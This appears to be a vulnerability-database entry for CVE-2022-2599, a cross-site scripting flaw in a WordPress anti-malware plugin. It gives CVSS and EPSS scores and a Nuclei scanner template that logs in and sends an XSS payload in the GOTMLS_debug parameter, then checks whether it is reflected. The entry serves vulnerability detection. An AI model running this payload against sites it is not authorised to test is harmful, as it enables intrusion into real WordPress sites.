WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting

2023-02-2309:02:08

ProjectDiscovery

github.com

wordpress

anti-malware

brute-force firewall

cross-site scripting

vulnerability

wpscan

gotmls

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

43.5%

JSON

WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.

id: CVE-2022-2599

info:
  name: WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks.
  remediation: |
    Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef
    - https://wordpress.org/plugins/gotmls/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2599
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2599
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43227
    cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: anti-malware_security_and_brute-force_firewall_project
    product: anti-malware_security_and_brute-force_firewall
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><img src onerror=alert(document.domain)>"
          - "GOTMLS_mt"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e258b9f11dbd18f7073278294b5e95f93cb1632ab09f0e8466385b501d27b928022060ccc0afb4dfe875564ae7d09563579f83b81e9f8397dfd44b16bbe0b03b439b:922c64590222798bb761d5b6d8e72950